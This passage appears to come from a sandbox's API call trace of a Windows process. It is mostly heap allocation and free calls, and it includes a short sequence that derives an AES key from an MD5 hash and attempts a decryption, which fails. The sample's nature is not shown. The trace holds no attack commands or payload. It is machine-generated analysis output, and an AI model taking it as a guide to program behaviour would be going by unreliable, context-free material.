dwFlags=0x0, lpMem=0xd9b080 | out: hHeap=0xb80000) returned 1 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe40 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b080 [0269.255] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcc0 [0269.256] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98aa0 [0269.256] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcc0 | out: hHeap=0xb80000) returned 1 [0269.256] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74f20000 [0269.258] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe68 [0269.258] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcc0 [0269.258] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98aa0 | out: hHeap=0xb80000) returned 1 [0269.258] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b080 | out: hHeap=0xb80000) returned 1 [0269.258] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe40 | out: hHeap=0xb80000) returned 1 [0269.258] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.260] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.260] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffce0 [0269.260] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcb0 [0269.260] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.260] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x18) returned 0xde3118 [0269.260] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.260] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde3118 | out: hHeap=0xb80000) returned 1 [0269.260] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.260] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.260] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.260] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffce0 [0269.260] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.261] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0269.261] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.261] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe40 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x1) returned 0xdffce0 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe90 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b080 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcb0 [0269.261] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd98aa0 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfeb8 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9afa8 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcb0 [0269.261] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9afa8 | out: hHeap=0xb80000) returned 1 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfee0 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9afa8 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.261] PeekMessageW (in: lpMsg=0x75f204, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f204) returned 0 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.261] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9afc0 [0269.261] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98a70 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af78 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffca0 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9af78 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffca0 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98a70 | out: hHeap=0xb80000) returned 1 [0269.262] PeekMessageW (in: lpMsg=0x75f204, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f204) returned 0 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9afa8 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfee0 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfeb8 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98aa0 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffce0 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe40 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b080 | out: hHeap=0xb80000) returned 1 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfe90 | out: hHeap=0xb80000) returned 1 [0269.262] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe90 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b080 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffce0 [0269.262] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b080 | out: hHeap=0xb80000) returned 1 [0269.262] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfe40 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b080 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98aa0 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcb0 [0269.263] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98aa0 | out: hHeap=0xb80000) returned 1 [0269.263] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcb0 | out: hHeap=0xb80000) returned 1 [0269.263] PeekMessageW (in: lpMsg=0x75f45c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f45c) returned 0 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfeb8 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98aa0 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcb0 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9afa8 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98a70 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffca0 [0269.263] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98a70 | out: hHeap=0xb80000) returned 1 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfee0 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98a70 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc80 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x30) returned 0xe19ca8 [0269.263] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0269.263] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xe19ca8 | out: hHeap=0xb80000) returned 1 [0269.263] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc80 | out: hHeap=0xb80000) returned 1 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0xc) returned 0xd9af78 [0269.263] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.264] PeekMessageW (in: lpMsg=0x75ee0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75ee0c) returned 0 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc80 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc70 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc70 | out: hHeap=0xb80000) returned 1 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc80 | out: hHeap=0xb80000) returned 1 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xda41a0 | out: hHeap=0xb80000) returned 1 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9af78 | out: hHeap=0xb80000) returned 1 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af78 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af90 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98a40 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af48 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af60 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98a10 [0269.264] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af18 [0269.264] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af30 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd989e0 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aee8 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9af00 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd989b0 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x40) returned 0xda41a0 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfee0 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aeb8 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aed0 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98980 [0269.265] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.265] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae88 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aea0 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98950 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc90 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc90 | out: hHeap=0xb80000) returned 1 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc90 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae70 [0269.266] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98920 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc80 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc70 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae28 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98920 | out: hHeap=0xb80000) returned 1 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc80 | out: hHeap=0xb80000) returned 1 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae28 | out: hHeap=0xb80000) returned 1 [0269.266] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc70 | out: hHeap=0xb80000) returned 1 [0269.266] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfee0 [0269.267] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc70 [0269.267] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae28 [0269.267] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc80 [0269.267] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc60 [0269.267] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98920 [0269.267] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae28 | out: hHeap=0xb80000) returned 1 [0269.267] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc80 | out: hHeap=0xb80000) returned 1 [0269.267] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98920 | out: hHeap=0xb80000) returned 1 [0269.267] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc60 | out: hHeap=0xb80000) returned 1 [0269.268] CryptAcquireContextA (in: phProv=0x75ede0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x75ede0*=0xbe7270) returned 1 [0269.269] CryptCreateHash (in: hProv=0xbe7270, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x75eb50 | out: phHash=0x75eb50) returned 1 [0269.270] CryptHashData (hHash=0xe17b60, pbData=0xd9ade0, dwDataLen=0xd, dwFlags=0x1) returned 1 [0269.271] CryptDeriveKey (in: hProv=0xbe7270, Algid=0x660e, hBaseData=0xe17b60, dwFlags=0x1, phKey=0x75eb50 | out: phKey=0x75eb50*=0xe17ba0) returned 1 [0269.271] CryptDestroyHash (hHash=0xe17b60) returned 1 [0269.279] CryptGetKeyParam (in: hKey=0xe17ba0, dwParam=0x7, pbData=0xdffbe0, pdwDataLen=0x75e638, dwFlags=0x0 | out: pbData=0xdffbe0*=0x660e, pdwDataLen=0x75e638*=0x4) returned 1 [0269.279] CryptDecrypt (in: hKey=0xe17ba0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xe1bf20, pdwDataLen=0x75eb68 | out: pbData=0xe1bf20, pdwDataLen=0x75eb68) returned 0 [0269.283] CryptDestroyKey (hKey=0xe17ba0) returned 1 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffb50 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x214) returned 0xbc7618 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffb10 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aca8 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98860 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad50 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc50 [0269.283] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad50 | out: hHeap=0xb80000) returned 1 [0269.283] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.283] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd98860 | out: hHeap=0xb80000) returned 1 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd98860 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ad50 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b038 [0269.283] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc50 [0269.283] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b038 | out: hHeap=0xb80000) returned 1 [0269.283] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.283] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ad50 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde0020 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adb0 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc30 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae40 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd989e0 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae28 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9acc0 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aee8 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9adc8 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9ae58 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xddfff8 | out: hHeap=0xb80000) returned 1 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffbb0 | out: hHeap=0xb80000) returned 1 [0269.284] PeekMessageW (in: lpMsg=0x75f394, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f394) returned 0 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xddfff8 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9ae58 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffbb0 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9adc8 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffc30 [0269.284] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.284] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc7840 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcd0 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7840 | out: hHeap=0xb80000) returned 1 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc30 | out: hHeap=0xb80000) returned 1 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde0020 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc30 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9b050 | out: hHeap=0xb80000) returned 1 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde0098 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9b050 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x10) returned 0xd9aee8 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x8) returned 0xdffcd0 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xd9aee8 | out: hHeap=0xb80000) returned 1 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20a) returned 0xbc7840 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffc50 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xbc7840 | out: hHeap=0xb80000) returned 1 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffc50 | out: hHeap=0xb80000) returned 1 [0269.285] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xdffcd0 | out: hHeap=0xb80000) returned 1 [0269.285] PeekMessageW (in: lpMsg=0x75f394, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x75f394) returned 0 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x4) returned 0xdffcd0 [0269.285] RtlAllocateHeap (HeapHandle=0xb80000, Flags=0x0, Size=0x20) returned 0xde00c0 [0269.286] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0269.286] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, lpMem=0xde00c0 | out: hHeap=0xb80000) returned 1 [0269.286] HeapFree (in: hHeap=0xb80000, dwFlags=0x0, 